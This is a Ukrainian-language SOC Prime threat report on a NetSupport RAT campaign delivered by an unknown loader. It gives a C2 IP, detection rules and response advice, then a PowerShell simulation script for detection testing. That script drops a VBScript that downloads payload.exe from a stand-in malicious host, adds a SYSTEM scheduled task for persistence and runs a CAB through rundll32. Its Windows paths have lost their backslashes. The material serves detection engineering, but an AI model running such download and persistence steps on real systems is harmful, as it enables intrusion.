SOC Prime Bias: Середній

03 Jun 2026 16:32 UTC

NetSupport RAT доставляється за допомогою невідомого завантажувача

Author Photo
SOC Prime Team linkedin icon Стежити
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Раніше невідомий засіб віддаленого доступу був помічений під час доставки небезпечного пакету NetSupport Manager RAT. Початковий шкідливий ПЗ спілкувався з сервером командування та контролю на 89.110.110.119 через TCP порт 443 використовуючи закодований трафік. Кампанія, відстежена як SmartApeSG ClickFix, залежала від шкідливих скриптів та архіву CAB для встановлення NetSupport RAT на системи жертв.

Розслідування

Розслідування виявило кілька індикаторів, включаючи шкідливі URL-адреси, IP-адреси та файли, записані у ProgramData директорію. Початковий RAT доставив пакетний скрипт, який вилучив і встановив NetSupport RAT з архіву setup.cab . Після завершення встановлення допоміжні файли були видалені, щоб зменшити видимі сліди активності.

Пом’якшення

Організації повинні блокувати мережевий трафік на виявлені небезпечні IP-адреси та домени та моніторити створення згаданих файлів у ProgramData. Захисні засоби кінцевих точок повинні виявляти виконання підозрілих VBScript та пакетних файлів, у той час як мережевий моніторинг повинен застосовувати суворіший контроль до закодованого трафіку через порт 443.

Реагування

Захисники повинні сигналізувати про перераховані індикатори, ізолювати уражені системи та проводити судово-медичний аналіз, щоб виявити будь-які механізми збереження. Шкідливі файли слід видалити, будь-які несанкціоновані зміни слід скасувати, а політику брандмауера потрібно оновити для блокування вихідного зв’язку з виявленою інфраструктурою командування та контролю.

Потік атаки

Виявлення

LOLBAS WScript / CScript (через process_creation)

Команда SOC Prime
02 червня 2026

Можливе виконання двійкового файлу NetSupport Manager із підозрілого каталогу (через process_creation)

Команда SOC Prime
02 червня 2026

Підозріле командувальне управління через незвичайний домен верхнього рівня (TLD) DNS запит (через dns)

Команда SOC Prime
02 червня 2026

IOC (HashSha256) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

IOC (SourceIP) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

IOC (DestinationIP) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

Виявлення інфекції NetSupport RAT через скрипт і файли CAB [Подія файлу Windows]

Правила AI від SOC Prime
02 червня 2026

Виявлення початкового та NetSupport RAT C2 зв’язку [Мережеве з’єднання Windows]

Правила AI від SOC Prime
02 червня 2026

Виконання симуляції

Передумова: Телеметрія та попередня перевірка базової лінії повинні бути успішно пройдені.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив повинні безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, яку очікує логіка виявлення.

  • Опис атаки та команди:
    Атакуючий, який отримав початковий доступ до хоста Windows, скидає три шкідливі артефакти до C:ProgramData:

    1. processor.vbs – сценарій Visual Basic, який завантажує головний двійковий файл RAT.
    2. token.bat – пакетний файл, який створює завдання, що планується для збереження.
    3. setup.cab – архів CAB, який містить DLL, що завантажується в C:ProgramData і пізніше завантажується через rundll32.exe.

    Потім атакуючий виконує кожний файл по черзі, що викликає події створення процесу, які містять точні шляхи файлів, необхідні для правила Sigma.

  • Сценарій регресійного тестування:

    # netSupport_RAT_simulation.ps1
    # -------------------------------------------------
    # ПРИЗНАЧЕННЯ: Відтворення телеметрії інфекції NetSupport RAT
    # -------------------------------------------------
    
    $targetDir = "C:ProgramData"
    # Переконайтесь, що каталог існує
    if (-Not (Test-Path $targetDir)) { New-Item -ItemType Directory -Path $targetDir -Force }
    
    # 1. Скидання processor.vbs
    $vbsPath = Join-Path $targetDir "processor.vbs"
    Set-Content -Path $vbsPath -Value @"
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.open "GET","http://malicious.example.com/payload.exe",False
    objXML.send
    "@"
    
    # 2. Скидання token.bat
    $batPath = Join-Path $targetDir "token.bat"
    Set-Content -Path $batPath -Value @"
    schtasks /create /tn "NetSupportPersist" /tr "$targetDirsetup.cab" /sc onlogon /ru System
    "@
    
    # 3. Скидання setup.cab (підроблений CAB, що містить текстовий файл)
    $cabPath = Join-Path $targetDir "setup.cab"
    $tempDir = "$env:TEMPcab_temp"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    Set-Content -Path "$tempDirdummy.txt" -Value "заповнювач"
    # Створення CAB – вимагає makecab (вбудований інструмент Windows)
    & makecab.exe "$tempDirdummy.txt" $cabPath
    
    # Фаза виконання – запуск виявлень
    Write-Host "`n[+] Виконується processor.vbs"
    cscript.exe //B //Nologo $vbsPath
    
    Write-Host "[+] Виконується token.bat"
    cmd.exe /c $batPath
    
    Write-Host "[+] Виконується setup.cab через rundll32 (симульоване завантаження)"
    rundll32.exe "$cabPath",DummyEntryPoint
    
    # Очищення тимчасової папки, використаної для створення CAB
    Remove-Item -Recurse -Force $tempDir
  • Команди очищення:

    # netSupport_RAT_cleanup.ps1
    $targetDir = "C:ProgramData"
    $files = @("processor.vbs","token.bat","setup.cab")
    foreach ($f in $files) {
        $fullPath = Join-Path $targetDir $f
        if (Test-Path $fullPath) { Remove-Item -Force $fullPath }
    }
    # Видалити створене token.bat завдання
    schtasks /delete /tn "NetSupportPersist" /f
    Write-Host "Очистка завершена."